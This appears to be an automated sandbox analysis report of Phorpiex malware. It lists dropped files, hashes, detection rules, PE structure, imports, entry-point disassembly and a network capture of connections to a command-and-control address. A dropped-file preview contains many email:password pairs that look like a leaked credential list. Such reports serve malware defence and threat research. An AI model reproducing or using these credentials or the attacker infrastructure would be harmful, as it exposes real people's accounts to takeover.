                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\2350331867.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5
                                                                                                                                                                                                                                                                Entropy (8bit):2.321928094887362
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:t:t
                                                                                                                                                                                                                                                                MD5:87C4FA52B44ABE5D3FF1331A932789DB
                                                                                                                                                                                                                                                                SHA1:51B4EF58DBB722727DCAB51A8174EE04A44976B2
                                                                                                                                                                                                                                                                SHA-256:0B84090FB907B71D77F8495AE09B7F1214CE7A5FF9BFBB747195AD9AED145EAA
                                                                                                                                                                                                                                                                SHA-512:8B76B89B85134675432C3647E3118868512D0A0AF379793146ABC86D90448547BDC9B85794D8083C6CF328477688D9E49D88232C647DF76B123BCD6A9F57C817
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                Preview:4378.
                                                                                                                                                                                                                                                                Process:C:\Windows\sysfevcs.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):14080
                                                                                                                                                                                                                                                                Entropy (8bit):7.985983798513775
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:hcrfzpEOqe0nBI5Ro4gj253HCVYRH1m0c0iA70GoOH28NWA:hcrfzp5qe0nu5Rqjw9H00AGoOH7gA
                                                                                                                                                                                                                                                                MD5:70E4B25FA3BA9C72E2EC8569ADD2B26D
                                                                                                                                                                                                                                                                SHA1:1F8E4E86031E7A5BA98E08C898E314F75783C047
                                                                                                                                                                                                                                                                SHA-256:8DE2472C8245A6DFBB2F23573D0EA2335F95EC9604919728E17EC652EF1EDAA9
                                                                                                                                                                                                                                                                SHA-512:076435909B60D3FB7EC28E8727A154F7F0CF334E42C5DE022B78AC7CDF75E8CF47CBA66B1FE236FDC5BE98CA603E570FCA5BE92C5C5D2780E7780402BBF1F909
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                Preview:$...r.....TP....R......E...AR..... :..g.d....!.7..j`\.P.d.I]mm...C.........L.^...N...-.yf}l..u..O.......L+...%..5.....b....).....e.Z..!o...h...4..T3.y.2~...*....l9[+..i\31Q.|..\..I:?...3..b..._p.......gO(K....bH..5.MoIb.@n......8)...u.y..W5>.....O...S.EN.>..... .~.mx..^g7..Xq.1.IbyN..U...{ .z=M6.Yj,....O.t"..=U....-F...*.q..:.....i.%=.........Ct_.l.....M...I..C[...0. .O&A3.......5i......V..2r...../.w<V.D_D\.w.g..(M.......X....R. ....9.....5.. ...e...K.N...?.....@....@..!.....vgL[.}....."J.7A.1.oo...+.)#...3.aj.._.L...S....-.....}q.!w&X.......v0.[.,.T.,...b... ....._wdW....`...._K..._..+9...P.Q.....N.2..<..z.5(......,rE.....|....7S....=..a...lO..o.?r.N.g...V.@)....:...fw..0..K.WY....@..^...:.i...}..\....H..pdI.,M#...G`...p.,..D..E..[....~.,s.kg...~mH=.\B.6....|U.....&....HN.#.zw.XPW.a..... ..r..qL .ai.hn.=..4...12...0e........_.\.....)h.A.x`...p.......6'............].*.ISk`.rN...B...[<0...,..z=.....y.... .U.............X..>.
                                                                                                                                                                                                                                                                Process:C:\Windows\sysfevcs.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):13824
                                                                                                                                                                                                                                                                Entropy (8bit):5.76638597845688
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:IxgsfrHgnflXs2Pcw7xMNKUSO5dzwFnXQqU6cQheP1oynnv8U9l:af+Xs21xc5dYn/BfI19v8U9
                                                                                                                                                                                                                                                                MD5:ACAD915C5FC6C177940F8ED644E4FF76
                                                                                                                                                                                                                                                                SHA1:4FD56B69DA978373B658948D7293EDC96CF0B4FA
                                                                                                                                                                                                                                                                SHA-256:99F329A604DC8410DD96F141885BEF2F9D0D4402630FA2012FDDBDC775F0CBE7
                                                                                                                                                                                                                                                                SHA-512:08EE49CA06FFE74AB669E59483DA24A37FA22EEB8CFFEDFE1D0C18738C375CFF71B515C2A63C91B1CF5C1C81BB9F2DAF4A6ECCD7E9F27517EABC234F2945BA8D
                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                                • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: C:\Users\user\AppData\Local\Temp\2350331867.exe, Author: Florian Roth
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D`_...1...1...1.'.J...1...0.K.1.o.5...1...?...1.o.;...1..y....1..y....1.Rich..1.........PE..L....^.c.............................'.......0....@..........................p............@..................................9.......P.......................`.......................................................0..@............................text...d........................... ..`.rdata..x....0......................@..@.data...<....@......................@....rsrc........P.......0..............@..@.reloc.......`.......2..............@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Windows\sysfevcs.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):74752
                                                                                                                                                                                                                                                                Entropy (8bit):6.382289002991035
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:I3Mz8pr+ehOVEn/g9u1ti/jQWlCsv038L7wlfFtzl:TwoehO0gArukWMsv0+ElfFt
                                                                                                                                                                                                                                                                MD5:042C4DA66DDA2CAB43007457E1E81A76
                                                                                                                                                                                                                                                                SHA1:ED9BB523DA72781C26F46EE1464F1E5FC1283C4A
                                                                                                                                                                                                                                                                SHA-256:48214F32E63F85FE88AFF17257A746862D7530BCE20B2DFC7A7B942743374A31
                                                                                                                                                                                                                                                                SHA-512:22212899E621988E57BA09E76871D23DFE49D8867878B89478BDA11B5A1F17293C2648A265706A74B7ED2B08DD7E5BEC51A0496674790560A8CA83DBF9B5E811
                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\2676917645.exe, Author: Joe Security
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 85%
                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]b1..._..._..._.aq^..._......._......._...P..._.>.2..._...^..._.>.$..._..{.>._..{..._.Rich.._.........PE..L......c.....................T......@[............@..........................P.......................................................................................................................................................................text...|........................... ..`.rdata.../.......0..................@..@.data...@"... ......................@...................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\2350331867.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):318423
                                                                                                                                                                                                                                                                Entropy (8bit):4.833201951529504
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:x+HZn8WTIeY03WggitEa9qaxJ71SLppu6mlPMYSIg5fajhm2mmvsa:x+HZ8WdYsWggitEa9qaL71SXWaMg6B
                                                                                                                                                                                                                                                                MD5:30AA99D5C12067ADD1CCAE04F6817B70
                                                                                                                                                                                                                                                                SHA1:29D6D8678430A8CC222FD1B89CC3E9927276C050
                                                                                                                                                                                                                                                                SHA-256:777514353448645064D04BF3DC3090671504C02B6F016C1CE7B0F3A946A015DD
                                                                                                                                                                                                                                                                SHA-512:095834744C3F57AAF223B0EADAC8DD6E0C7C9749758660256F3A96BD3535518238E1EA741CCA82ADF31459D8BF13343DED0BC41FB1091F79829C663AEC472E9E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                Preview:.com.au:mucahit07.eskapone@westnet.com.au:amiah00.eskarn@brentbernard.com.au:sharman.eskarwecka@yahoo.com.au:545454.eskaterboy@yahoo.com.au:244858.eskatteb@netspace.net.au:xtr8833.eskavy@camtech.net.au:eskavy.eskavy@camtech.net.au:eskavy@camtech.net.au.eskavy@ozemail.com.au:nD6aO9bS.eskay1@optusnet.com.au:bella0704.eskay_tara@yahoo.com.au:aitutaki.eskay_tara@yahoo.com.au:aitutaki27.eskay_tara@yahoo.com.au:phone28601.eskaye10@yahoo.com.au:khalem.eskayme@yahoo.com.au:dirtyduo.eskayphotography@yahoo.com.au:spiderman3.eskayw23@yahoo.com.au:eskay2009.eskd4687@yahoo.com.au:boyoboy.eskdale_brisbane@yahoo.com.au:eskdale.eskdale_brisbane@yahoo.com.au:glenelg.eske@imv.au.dk:74751188.eske_187@yahoo.com.au:llw239.eskedar_ty@yahoo.com.au:music2.eskedes@yahoo.com.au:loveely1.eskee23@yahoo.com.au:esky23.eskell_1979@yahoo.com.au:qazwsx123456.eskey@optusnet.com.au:casper01.eskey@optusnet.com.au:casper1.eskeyo@yahoo.com.au:Asdfasdf1.eskfield@myaccess.com.au:roses1.eskfield@yahoo.com.au:123I"c"u.eskfield
                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\2676917645.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):74752
                                                                                                                                                                                                                                                                Entropy (8bit):6.382289002991035
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:I3Mz8pr+ehOVEn/g9u1ti/jQWlCsv038L7wlfFtzl:TwoehO0gArukWMsv0+ElfFt
                                                                                                                                                                                                                                                                MD5:042C4DA66DDA2CAB43007457E1E81A76
                                                                                                                                                                                                                                                                SHA1:ED9BB523DA72781C26F46EE1464F1E5FC1283C4A
                                                                                                                                                                                                                                                                SHA-256:48214F32E63F85FE88AFF17257A746862D7530BCE20B2DFC7A7B942743374A31
                                                                                                                                                                                                                                                                SHA-512:22212899E621988E57BA09E76871D23DFE49D8867878B89478BDA11B5A1F17293C2648A265706A74B7ED2B08DD7E5BEC51A0496674790560A8CA83DBF9B5E811
                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\sysfevcs.exe, Author: Joe Security
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 85%
                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]b1..._..._..._.aq^..._......._......._...P..._.>.2..._...^..._.>.$..._..{.>._..{..._.Rich.._.........PE..L......c.....................T......@[............@..........................P.......................................................................................................................................................................text...|........................... ..`.rdata.../.......0..................@..@.data...@"... ......................@...................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Windows\sysfevcs.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):288
                                                                                                                                                                                                                                                                Entropy (8bit):7.29621987971922
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:wZfMYOfXS2TwUIvoFpdC4F4snUA6x1Y9ydeaNhjiyeRpq7nErg:wZfZOvsZ6dUalO3hjiNq7f
                                                                                                                                                                                                                                                                MD5:2C09AAA94292E236DEDF65CD02574B73
                                                                                                                                                                                                                                                                SHA1:1EA7306EAB3F49BB3EF78AD6299F8FEA8593F06B
                                                                                                                                                                                                                                                                SHA-256:88E4BB3EA5568AD9EF3BBC25A1A82451215E1E721CA572A49CDC0DEE244AE6FC
                                                                                                                                                                                                                                                                SHA-512:0E89F24C87C288676EBF8C18685CB8DB0E714A2021CB84F6256A798D4A706C810379CFE98A654A642FF67420BDBD2D53C265F02382A6FA1B9AD5471A04B8F101
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:gv.*..\h(..V..N...jBS.C..0.TD..!..2=H...d-...../4..&.QN.^<.......-mj..Y.....c..:?...t...;..]0......5.9/...j....2..d.O.Qh...IZ.......:...v...i.p.>H.......+...y$0o..-.k...3.5l3O7.k8.?VN..$.v...E.\F....b..%..2x...+|c....p......7..{a.^!h.ac.F..G(^........==H((.K.x.....WJ...
                                                                                                                                                                                                                                                                Process:C:\Windows\sysfevcs.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4096
                                                                                                                                                                                                                                                                Entropy (8bit):4.909852260227297
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:fkymh2YbRpumRfq/tXhQSn42UpdEzYePkfb2bCE+6ndWw3/47nHw2eyP:Myy2UamRf6tXmH26EzYesKCE+6Iw3/4d
                                                                                                                                                                                                                                                                MD5:987FBC594CBC4E1DC2C9FB8E78C711D5
                                                                                                                                                                                                                                                                SHA1:64408CB74812C8FBE5F847047F492FF5951F0865
                                                                                                                                                                                                                                                                SHA-256:09FF19FD134B1A2E366577B930160C1E6F58140A778B0554BC0F27071D3C3F32
                                                                                                                                                                                                                                                                SHA-512:4B57A5C0CD36EF9B8EFBA23F60F999F21652467A2BCE7C62C2F10971AC1E671685F8DD7D5D29E81528B1E44F392262CE53B55320796EBC1363849438A31E9868
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.o..X.P..sP.X.P_.\.X.PPP..X.Pm...X.P%..9.X.PWL'i.X.Po_..X.P....X.P..k.X.P.....X.P.#.}.X.P.G.l.X.P...].X.PN&..X.P...X.P...J..............,.....);.)....m...............ppT.....pt.......T......X.......F.C......o.....f,.S..........m........E@..............A.......\.................\......Z....._.p.....mJF......u................q....[.J.......8O.....p{j.....#........eG.....i.7.....dZ........>....Ok!(.......d............Vk........\'......eK....-..D...........f.9........e.....#, ......q......7\......{.V............)F......)........Z.+....LiTx....]v;<.....y.l...........\.1.......cw.....................p ............\} x....[\.j.....z.0....[\......-.. ..............r.............U.......f......Y..C....^.b/....o^B......J.z............Y.......sp"....]..(....Y.........`H...._;......R.RH....uh.......py;.....B.......#........M.......[.............Y.........m......K......EC.V......6......pk..............lI.......J....^.>......#......EC.h....R..!..............l\....6'..............
                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\l3Qj8QhTYZ.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):74752
                                                                                                                                                                                                                                                                Entropy (8bit):6.382289002991035
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:I3Mz8pr+ehOVEn/g9u1ti/jQWlCsv038L7wlfFtzl:TwoehO0gArukWMsv0+ElfFt
                                                                                                                                                                                                                                                                MD5:042C4DA66DDA2CAB43007457E1E81A76
                                                                                                                                                                                                                                                                SHA1:ED9BB523DA72781C26F46EE1464F1E5FC1283C4A
                                                                                                                                                                                                                                                                SHA-256:48214F32E63F85FE88AFF17257A746862D7530BCE20B2DFC7A7B942743374A31
                                                                                                                                                                                                                                                                SHA-512:22212899E621988E57BA09E76871D23DFE49D8867878B89478BDA11B5A1F17293C2648A265706A74B7ED2B08DD7E5BEC51A0496674790560A8CA83DBF9B5E811
                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysfevcs.exe, Author: Joe Security
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 85%
                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]b1..._..._..._.aq^..._......._......._...P..._.>.2..._...^..._.>.$..._..{.>._..{..._.Rich.._.........PE..L......c.....................T......@[............@..........................P.......................................................................................................................................................................text...|........................... ..`.rdata.../.......0..................@..@.data...@"... ......................@...................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Entropy (8bit):6.382289002991035
                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                File name:l3Qj8QhTYZ.exe
                                                                                                                                                                                                                                                                File size:74752
                                                                                                                                                                                                                                                                MD5:042c4da66dda2cab43007457e1e81a76
                                                                                                                                                                                                                                                                SHA1:ed9bb523da72781c26f46ee1464f1e5fc1283c4a
                                                                                                                                                                                                                                                                SHA256:48214f32e63f85fe88aff17257a746862d7530bce20b2dfc7a7b942743374a31
                                                                                                                                                                                                                                                                SHA512:22212899e621988e57ba09e76871d23dfe49d8867878b89478bda11b5a1f17293c2648a265706a74b7ed2b08dd7e5bec51a0496674790560a8ca83dbf9b5e811
                                                                                                                                                                                                                                                                SSDEEP:1536:I3Mz8pr+ehOVEn/g9u1ti/jQWlCsv038L7wlfFtzl:TwoehO0gArukWMsv0+ElfFt
                                                                                                                                                                                                                                                                TLSH:06732900F550D53AF4F740FFF2BB04AE6928EFA4434698DB22D4689F6B216C1A932597
                                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]b1..._..._..._.aq^..._......._......._...P..._.>.2..._...^..._.>.$..._..{..>._..{...._.Rich.._.........PE..L......c...........
                                                                                                                                                                                                                                                                Icon Hash:00828e8e8686b000
                                                                                                                                                                                                                                                                Entrypoint:0x405b40
                                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                Time Stamp:0x639603A8 [Sun Dec 11 16:22:00 2022 UTC]
                                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                                Import Hash:83bcccb089013e02973a47f8d54106e0
                                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                                sub esp, 00000C14h
                                                                                                                                                                                                                                                                push 000007D0h
                                                                                                                                                                                                                                                                call dword ptr [0040F0ECh]
                                                                                                                                                                                                                                                                mov dword ptr [ebp-00000214h], 00000000h
                                                                                                                                                                                                                                                                mov dword ptr [ebp-0000083Ch], 00002382h
                                                                                                                                                                                                                                                                mov eax, dword ptr [ebp-00000214h]
                                                                                                                                                                                                                                                                cmp eax, dword ptr [ebp-0000083Ch]
                                                                                                                                                                                                                                                                jnc 00007F2474CAED08h
                                                                                                                                                                                                                                                                push 0041014Ch
                                                                                                                                                                                                                                                                call dword ptr [0040F168h]
                                                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                                                je 00007F2474CAECE8h
                                                                                                                                                                                                                                                                push 00410174h
                                                                                                                                                                                                                                                                call dword ptr [0040F0BCh]
                                                                                                                                                                                                                                                                push 00410190h
                                                                                                                                                                                                                                                                call dword ptr [0040F090h]
                                                                                                                                                                                                                                                                push 004101A0h
                                                                                                                                                                                                                                                                push 004101B0h
                                                                                                                                                                                                                                                                call dword ptr [0040F098h]
                                                                                                                                                                                                                                                                mov ecx, dword ptr [ebp-00000214h]
                                                                                                                                                                                                                                                                add ecx, 01h
                                                                                                                                                                                                                                                                mov dword ptr [ebp-00000214h], ecx
                                                                                                                                                                                                                                                                jmp 00007F2474CAEC6Eh
                                                                                                                                                                                                                                                                push 00412BE4h
                                                                                                                                                                                                                                                                push 00000000h
                                                                                                                                                                                                                                                                push 00000000h
                                                                                                                                                                                                                                                                call dword ptr [0040F094h]
                                                                                                                                                                                                                                                                mov dword ptr [ebp-00000A4Ch], eax
                                                                                                                                                                                                                                                                call dword ptr [0040F028h]
                                                                                                                                                                                                                                                                cmp eax, 000000B7h
                                                                                                                                                                                                                                                                jne 00007F2474CAECCAh
                                                                                                                                                                                                                                                                push 00000000h
                                                                                                                                                                                                                                                                call dword ptr [0040F0A0h]
                                                                                                                                                                                                                                                                mov dword ptr [ebp-00000424h], 00000000h
                                                                                                                                                                                                                                                                mov dword ptr [ebp-0000020Ch], 00000001h
                                                                                                                                                                                                                                                                push 00000105h
                                                                                                                                                                                                                                                                push 00413590h
                                                                                                                                                                                                                                                                push 00000000h
                                                                                                                                                                                                                                                                call dword ptr [00000000h]
                                                                                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                                                                                • [ C ] VS2005 build 50727
                                                                                                                                                                                                                                                                • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                                • [LNK] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x10fe40x104.rdata
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0xf0000x304.rdata
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                .text0x10000xde7c0xe000False0.470458984375data6.13584392261674IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                .rdata0xf0000x2f2e0x3000False0.4558919270833333data5.611658051228627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                .data0x120000x22400x1000False0.68359375OpenPGP Public Key6.432969777538349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                                                WS2_32.dllrecvfrom, setsockopt, sendto, send, recv, WSAStartup, ioctlsocket, bind, WSACloseEvent, WSARecv, WSASend, WSAGetLastError, WSAEnumNetworkEvents, gethostname, connect, inet_ntoa, inet_addr, htons, getsockname, shutdown, socket, closesocket, gethostbyname, WSAEventSelect, WSAGetOverlappedResult, WSAWaitForMultipleEvents, getpeername, accept, WSACreateEvent, WSASocketA, listen
                                                                                                                                                                                                                                                                SHLWAPI.dllPathFileExistsW, StrCmpNW, PathMatchSpecW, PathFindFileNameW, StrChrA, StrStrIA, StrCmpNIA, StrStrW
                                                                                                                                                                                                                                                                urlmon.dllURLDownloadToFileW
                                                                                                                                                                                                                                                                WININET.dllHttpOpenRequestA, InternetOpenUrlW, InternetOpenUrlA, HttpQueryInfoA, InternetOpenW, InternetCloseHandle, InternetOpenA, HttpSendRequestA, InternetConnectA, InternetCrackUrlA, InternetReadFile, HttpAddRequestHeadersA
                                                                                                                                                                                                                                                                ntdll.dllmemcpy, _chkstk, _aulldiv, RtlUnwind, memmove, mbstowcs, RtlTimeToSecondsSince1980, NtQuerySystemTime, NtQueryVirtualMemory, strstr, isdigit, isalpha, _allshl, _aullshr, memset
                                                                                                                                                                                                                                                                msvcrt.dllrand, srand, _vscprintf
                                                                                                                                                                                                                                                                KERNEL32.dllGetLastError, CreateProcessW, GetLocaleInfoA, DuplicateHandle, DeleteCriticalSection, GetThreadPriority, SetThreadPriority, GetCurrentThread, GetCurrentProcess, InterlockedExchangeAdd, InterlockedIncrement, InterlockedExchange, WaitForSingleObject, InterlockedDecrement, GetCurrentProcessId, HeapSetInformation, GetSystemInfo, PostQueuedCompletionStatus, GetProcessHeaps, HeapValidate, HeapCreate, HeapFree, HeapAlloc, HeapReAlloc, ExpandEnvironmentStringsW, CreateThread, DeleteFileA, CreateMutexA, MoveFileA, CreateEventA, ExitProcess, GetQueuedCompletionStatus, CreateIoCompletionPort, SetEvent, GetVolumeInformationW, SetFileAttributesW, lstrcpyW, DeleteFileW, GetDiskFreeSpaceExW, FindNextFileW, lstrcmpiW, QueryDosDeviceW, RemoveDirectoryW, FindClose, lstrlenA, GlobalLock, GetModuleHandleW, GetTickCount, GlobalAlloc, Sleep, lstrcpynW, ExitThread, MultiByteToWideChar, lstrlenW, GlobalUnlock, GetFileSize, MapViewOfFile, UnmapViewOfFile, WriteFile, InitializeCriticalSection, LeaveCriticalSection, CreateFileW, FlushFileBuffers, EnterCriticalSection, CreateFileMappingW, CloseHandle, FindFirstFileW, GetDriveTypeW, MoveFileExW, CreateDirectoryW, GetLogicalDrives, CopyFileW, GetModuleFileNameW, lstrcmpW
                                                                                                                                                                                                                                                                USER32.dllTranslateMessage, RegisterClassExW, wsprintfW, GetClipboardData, EmptyClipboard, ChangeClipboardChain, SetWindowLongW, DefWindowProcA, RegisterRawInputDevices, CreateWindowExW, SendMessageA, IsClipboardFormatAvailable, CloseClipboard, GetMessageA, wsprintfA, wvsprintfA, GetWindowLongW, DispatchMessageA, OpenClipboard, SetClipboardData, SetClipboardViewer
                                                                                                                                                                                                                                                                ADVAPI32.dllRegSetValueExW, CryptGenRandom, CryptReleaseContext, CryptAcquireContextW, RegQueryValueExW, RegOpenKeyExA, RegSetValueExA, RegCloseKey, RegOpenKeyExW
                                                                                                                                                                                                                                                                SHELL32.dllShellExecuteW
                                                                                                                                                                                                                                                                ole32.dllCoInitializeEx, CoCreateInstance, CoInitialize, CoUninitialize
                                                                                                                                                                                                                                                                OLEAUT32.dllSysFreeString, SysAllocString
                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                Dec 12, 2022 18:53:58.800220966 CET4969980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:53:58.868463993 CET8049699185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:53:58.868722916 CET4969980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:53:58.874058962 CET4969980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:53:58.936228037 CET8049699185.215.113.66192.168.2.3
